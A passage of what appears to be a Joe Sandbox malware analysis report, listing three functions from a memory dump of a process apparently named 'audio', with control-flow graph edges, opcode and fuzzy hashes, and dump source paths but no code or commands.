                                                      • Instruction ID: e99e04764a0ff8734a007ac49ae727d4b04277c137c1bfe24e375ef45f863427
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: C111D3B6544280CFCB16CF10D5C4B56BF71FF88314F24C6A9D8494B656C33AD45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD4D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 21bd4d3-21bd4ea 230 21bd57e-21bd585 229->230 231 21bd4f0 229->231 232 21bd4f2-21bd4fe 230->232 231->232 233 21bd58a-21bd58f 232->233 234 21bd504-21bd526 232->234 233->234 236 21bd528-21bd546 234->236 237 21bd594-21bd5a9 234->237 240 21bd54e-21bd55e 236->240 241 21bd560-21bd568 237->241 240->241 242 21bd5b6 240->242 243 21bd5ab-21bd5b4 241->243 244 21bd56a-21bd57b 241->244 243->244
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c754a586a0abdaff788f718b5ceccf7f8b07d893dcd9ac40a48ef0b8b6cbd53a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: A811D376544240CFCB16CF10D5C4B56BF71FF84318F24C6A9D8094B656C33AD45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD006 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 299 21bd006-21bd03d 302 21bd03f-21bd04a 299->302 303 21bd08d-21bd095 299->303 304 21bd04c-21bd05a 302->304 305 21bd082-21bd089 302->305 303->302 308 21bd060 304->308 305->304 309 21bd08b 305->309 310 21bd063-21bd06b 308->310 309->310 311 21bd07b-21bd080 310->311 312 21bd06d-21bd075 310->312 311->312 312->311
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd6d7035876ba77127cac1e53723155828dab39a4cb57da281b4b305b21d5ecc
                                                      • Instruction ID: 058707527086418938cd288fbd93345ed16b0500d0852ac257386157710590c3
                                                      • Opcode Fuzzy Hash: bd6d7035876ba77127cac1e53723155828dab39a4cb57da281b4b305b21d5ecc
                                                      • Instruction Fuzzy Hash: FF01697104D3C09FD7168B259884792BFB8DF43224F1985CBE9888F1A3C3695C44CB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 021BD01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 314 21bd01d-21bd03d 315 21bd03f-21bd04a 314->315 316 21bd08d-21bd095 314->316 317 21bd04c-21bd05a 315->317 318 21bd082-21bd089 315->318 316->315 321 21bd060 317->321 318->317 322 21bd08b 318->322 323 21bd063-21bd06b 321->323 322->323 324 21bd07b-21bd080 323->324 325 21bd06d-21bd075 323->325 324->325 325->324
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfbff5f18571893e7349fe0a16e9e680ded53563c0d5b016167af046d8bc431a
                                                      • Instruction ID: f6210e1979783e74aa9b58d1ca0666318f329021aabe935deb61270c7a054e98
                                                      • Opcode Fuzzy Hash: dfbff5f18571893e7349fe0a16e9e680ded53563c0d5b016167af046d8bc431a
                                                      • Instruction Fuzzy Hash: 2601DB71448340AFE7294E25DD847E7BBE8DF45624F18C419ED580B142C7799841CAB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%